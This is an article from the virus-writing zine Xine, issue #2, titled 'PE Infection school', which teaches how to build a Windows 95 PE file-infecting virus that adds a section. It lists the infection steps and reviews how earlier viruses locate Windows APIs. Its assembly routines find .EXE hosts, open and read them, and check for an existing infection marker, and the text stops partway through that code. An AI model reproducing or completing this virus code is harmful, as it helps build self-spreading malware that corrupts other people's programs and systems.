/-----------------------------\ | Xine - issue #2 - Phile 011 | \-----------------------------/ PE Infection school by JHB Infecting a PE files is a little complex unlike in dos, you must also do some "strange" things to open and read files. For those among us who do know little about Windows this may be tough to grasp but it just another hurdle that Microsoft has put in virii writers/just plain hackers of Win95. I will try in this article to break it down into managable steps but I will concentrate on the infection part and leave the other aspects to other articles, and other people I hope to explain. This article will be specific to a PE infector that will add a section. Try reading the last 2 vlad's and IR latest zine for more info on RVA's and other PE win95 features. Ok I will probaly glance over things that you might feel are important if so I hope you take the hint that "you" might need to study some more. Here we go school is in session, lets start with some info that we all as virii writers or researchers should know the steps a virus makes to spread. 1 Find a file 2 Read enough of the file into a buffer to determine A If it is a file the virii can infect. B If it is already infected 3 At this point we know the file is appears to be a proper host. A Write the virii to the end of the host. B Modify the header, write it to the host C Close the host 4 Well at this point we return control to the orginal host. (this is a part I am going to only give a glimpse at) Due to the way Win95 "guards" the interrupts, the virii needs to get access to the Win API. Bizatch: The first VLAD PE virus saves the API's address in it this form of hardcodeing can cause the virus to fail in other version of Win95. Punch: The VLAD VxD virus does this by fooling with the imports and then fixing it so the host see it as it should be Mr Klunky: IR's VxD virus, not sure sorry Mr K just have not had time Murkry: The first PE header infector (by my friend) also use the hardcodeing method Spawn95: This virus is a companion virus and of course use the API's like a normal PE program does Puma : First seen in this issue of Zine 2 use a search engine to get the API address. Should be more robust then the hardcode method but Punch95 method should be a better way. Ok a brief synaspe of some Win95 virus and how they grab API's well I wanted a simple way, and sorta wanted it to be like DOS infections. Hmm well there is away to call int 21's in Win95 you need the first Exported API which is called CallVxD0 by some books this program will use this method this will have a added advatage of allowing the virus to use Int 21 like calls. But may not be as robust as Punch's method, it should work better than straight hardcodeing. Read the notes on the GetProc engine in Zine 2 to find out more about this. Also the article on hooking API's in Zine 2. Wow thats enough of a Tangent and probaly bored the hell out of most of ya ;). On to the virii code, -----1 Find a file. Well Win95 has a Findfirst and FindNext routine we can call using VxDcall -int21(just called int21 for now on) if this looks familiar it should its just the Win95 version of int 21 4eh, and int 21 4fh FILE equ 00400300h ;data FNAME EQU 02CH ;for the find file routines Fexe db '*.EXE',0 FindFile: mov eax,0000714eh mov edx,offset Fexe xor esi,esi inc esi push ds pop es mov Edi, FILE xor ecx,ecx Call INT_21 mov ebx,eax ret ;------------------------------------------------------------- ;ax = 714Fh ;bx = file handle from previous search ;si = date time requested ;es:di buffer for findata ;note ebx = the search handle FindNext: mov eax,0000714fh mov esi,1 mov edi, FILE call INT_21 ret ;------------------------------------------------------------- -----2 Read enough of the file into a buffer to determine ----- A If it is a file the virii can infect. again use the int21 open file ;------------------------------------------------------------- ;usual dos function here just need the filename from the search routine ;check cf for error OpenFile: mov eax,00003d02h mov Edx,FILE + FNAME xor ecx,ecx call INT_21 mov EBX,eax ret ;------------------------------------------------------------- use the int21 read file ;------------------------------------------------------------- ;ecx number of bytes ;edx = where we write the info to ReadFile: mov eax, 00003f00h ;mov ecx,2 ;mov Edx,OFFSET test call INT_21 ret ;------------------------------------------------------------- but win95 throws a problem here you cant write to the host data it mite be initialize date and you would destroy it. So I am using the "dead" space from the PE header to the first segment to write to this is only possible due to the fact the the VxD calls are ignoring the limits that win95 can put on us. Then I can move the important stuff to the stack and read write there. The stack is small and rather than change it I use is as little as I can. Ok we know have the header in memory the typical PE header is including the intersting tables is about 1K in size. Actaul its usual alot smaller but 1k will read in the dos MZ header and the PE part. -------B If it is already infected Well for this test we can check the section names for our header XINE is a good name as any ;). so we check to the last section header. 1 find the PE find the offset by looking into the MZ header at offset 3ch then use that offset to get the other info just for simplicity () means the value we are pointing at [] means a constant PEhder(3CH) + PE_SIZE[F8H]+ ((NumSect(6)-1) * SecSze[28H]) ok this value is the pointer to the last section header name now put this in esi and do lodsw mov esi,[PEHDER] ;3Ch push esi add esi,6 mov eax,[esi] dec eax mov cx,SECSZE ;28h mul cx pop ecx add eax,ecx add eax,PeSize ;0F8h push eax pop esi lodsd cmp eax,"xki." jne InfectIt AllReady: ret